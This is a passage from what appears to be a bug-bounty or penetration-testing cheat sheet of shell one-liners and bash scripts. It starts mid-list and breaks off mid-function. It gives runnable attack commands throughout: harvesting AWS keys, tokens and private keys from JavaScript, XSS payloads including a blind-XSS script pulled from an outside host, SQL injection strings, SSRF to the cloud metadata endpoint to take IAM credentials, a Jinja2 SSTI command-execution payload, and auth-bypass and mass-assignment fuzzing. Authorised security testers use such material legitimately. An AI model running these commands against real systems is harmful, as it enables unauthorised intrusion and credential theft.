curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 CommonCrawl Extraction

# ☠️ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt

💀 VirusTotal Subdomains

# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 DNS Zone Transfer Attempt

# ☠️ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt

💀 Reverse IP Lookup

# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 BGP/ASN Range Scanner

# ☠️ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

💀 PTR Records from IP Range

# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 All-in-One Mega Oneliner

# ☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

💀 Subdomain Permutation/Bruteforce

# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 DNS Wordlist Bruteforce with PureDNS

# ☠️ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

💀 TLS/SSL Certificate Grabber

# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon Hash -> Shodan

# ☠️ Find related hosts via favicon hash (Shodan's http.favicon.hash is MurmurHash3 of the base64-encoded favicon, not an MD5; needs: pip install mmh3)
curl -s https://target.com/favicon.ico | python3 -c 'import sys,base64,mmh3; print(mmh3.hash(base64.encodebytes(sys.stdin.buffer.read())))' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

💀 Google Dork Subdomain Discovery

# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

📜 JavaScript Recon

Complete JS Pipeline

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt

Extract Secrets from JS

cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -l js.txt -t exposures/

LinkFinder on JS Files

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

SecretFinder Mass Scan

cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

JS Variables Extraction

cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u

API Keys from JS

cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Extract All URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[^\"'[:space:]<>\`]+" | sort -u | anew js_urls.txt

Find API Endpoints in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"'[:space:]<>\`]+|/v[0-9]+/[^\"'[:space:]<>\`]+)" | sort -u

Extract Hardcoded Credentials

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

Extract AWS Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extract Google API Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txt

Extract Firebase URLs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

Extract S3 Buckets from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

Extract Internal IPs from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Extract Slack Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

Extract GitHub Tokens from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Extract Private Keys from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

Extract Email Addresses from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extract Hidden Subdomains from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

💀 Extract GraphQL Endpoints from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 Extract JWT Tokens from JS Files

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

💀 Find Webpack Source Maps

cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 Extract Discord Webhooks from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

💀 Find Hidden Admin Routes in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

💉 XSS Detection

Dalfox Pipeline

cat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bav

Blind XSS with Callback

cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Fast Scan

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

Knoxss API

cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

DOM XSS Detection

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'

Mass XSS with Nuclei DAST

cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Reflected Parameter Detection

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

XSS Polyglot Testing

cat urls.txt | gf xss | qsreplace 'jaVasCript:/*-/*`/*\`/*'"'"'/*"/**/(/* */oNcLiCk=alert() )//' | httpx -silent -mr "alert"

🗄️ SQL Injection

SQLMap Mass Scan

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

Error-Based Detection

cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -mr "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Time-Based Blind

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

Ghauri Scan

cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

UNION Detection

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

Boolean-Based Detection

cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

NoSQL Injection

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

🌐 SSRF & SSTI

SSRF with Interactsh

cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

SSRF Parameter Fuzzing

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

SSTI Detection

cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI Payload Test

cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"

Full SSRF Chain

cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF with DNS Rebinding

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

Jinja2 SSTI

cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ Web Crawling

Katana Deep Crawl

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

Gospider Full Crawl

gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler with Scope

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

ParamSpider Discovery

paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore Historical URLs

waymore -i target.com -mode U -oU urls.txt

Crawl with Headless Browser

katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Extract Forms

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

💀 Katana Multi-Target Deep Crawl + JS Parsing

# ☠️ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt

💀 Gospider Recursive + Sitemap + Robots

# ☠️ Full crawl with sitemap parsing and robots.txt extraction
gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt

💀 Hakrawler + Wayback + GAU Combined Crawler

# ☠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt

💀 Katana Headless + Form Autofill + Screenshot

# ☠️ Headless browser crawl with form interaction and XHR capture
katana -u https://target.com -headless -d 6 -jc -aff -xhr -fx -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt

💀 Cariddi Full Crawl with Secret Detection

# ☠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt

💀 Parallel Domain Crawler Pipeline

# ☠️ Mass parallel crawling with deduplication
cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt

💀 Katana + Gospider + LinkFinder Chain

# ☠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt

💀 Recursive Crawl + Nuclei Auto-Scan Pipeline

# ☠️ Crawl then auto-scan discovered endpoints for vulnerabilities
katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E "\.(php|asp|aspx|jsp|do|action)(\?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt

💀 Waymore + Katana Historical + Live Merge

# ☠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt

💀 Multi-Crawler Output Dedup + Parameter Extraction

# ☠️ Run all crawlers and extract unique parameters
(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt

🔑 Parameter Discovery

X8 Hidden Parameters

cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Discovery

arjun -i urls.txt -oT arjun_params.txt --stable

Custom Param Bruteforce

while read -r url; do ffuf -u "${url}?FUZZ=test" -w params.txt -mc 200,301,302 -ac; done < urls.txt

Mine Parameters from JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

Parameter Pollution Test

cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 Content Discovery

Ffuf Directory Bruteforce

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

💀 Recursive Fuzzing - ffuf Deep Scan

# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

💀 Feroxbuster Full Recursive Scan

# ☠️ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

💀 Feroxbuster Multi-Target Recursive

# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o ferox_@.txt

💀 ffuf + Feroxbuster Pipeline (Extensions + Recursion)

# ☠️ Find directories with ffuf, then deep scan each with feroxbuster
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

💀 Recursive Fuzzing with Extensions Mass Scan

# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

💀 Feroxbuster Parallel Recursive Scan

# ☠️ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

💀 Feroxbuster Silent Recursive + Headers

# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

💀 Feroxbuster Extract Links + Recursive

# ☠️ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

💀 Feroxbuster Resume + Filter by Size

# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

💀 Feroxbuster API Endpoints Discovery

# ☠️ Recursive API fuzzing with JSON content-type
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

Git Exposure

cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Sensitive Files

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

Backup Files

cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

API Documentation

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

Source Code Leak

cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Config Files

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

Database Files

cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ Nuclei Scanning

Full Template Scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

CVE Scanning

nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Subdomain Takeover

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

Exposed Panels

nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Misconfigurations

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

DAST Mode

nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Custom Tags

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

Network Scanning

nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 API Security Testing

GraphQL Introspection

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

REST API Enumeration

cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

JWT Analysis

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt

API Key Leakage

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

Broken Authentication

# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

Rate Limiting Test

for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

BOLA/IDOR Testing

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

💀 API Endpoint Fuzzing with ffuf

# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

💀 API Version Fuzzing

# ☠️ Discover hidden API versions
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

💀 REST API Methods Fuzzing

# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

💀 GraphQL Fuzzing with ffuf

# ☠️ Fuzz GraphQL endpoints for introspection and queries
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

💀 API Parameter Fuzzing

# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

💀 API Authentication Bypass Fuzzing

# ☠️ Test auth bypass techniques on protected endpoints
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

💀 OpenAPI/Swagger Fuzzing

# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

💀 API JSON Fuzzing with Nuclei

# ☠️ Mass API fuzzing with nuclei DAST mode
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

💀 API Mass Assignment Fuzzing

# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

💀 API FUZZ with Custom Wordlist Generation

# ☠️ Generate API wordlist from JS files and fuzz
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

☁️ Cloud Security

AWS S3 Bucket Finder

cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3 Permission Check

cat s3_buckets.txt | sed -e 's|^s3://||' -e 's/\.s3\.amazonaws\.com$//' | sort -u | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

Firebase Database

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage

cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt

GCP Storage

cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

AWS Metadata SSRF

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

Cloud Credential Files

cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 Automation Scripts

Full Recon Pipeline

#!/bin/bash
domain=$1
mkdir -p "$domain" && cd "$domain" || exit 1

# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt

# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt

# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt

# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt

# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

XSS Hunter Script

#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

API Recon Script

#!/bin/bash
target=$1
mkdir -p "$target/api" && cd "$target/api" || exit 1

# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "/api/[^\"'[:space:]<>\`]+" | sort -u | anew js_api_endpoints.txt

# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

⚙️ Bash Functions

Add to your .bashrc or .zshrc:

# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -mr "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
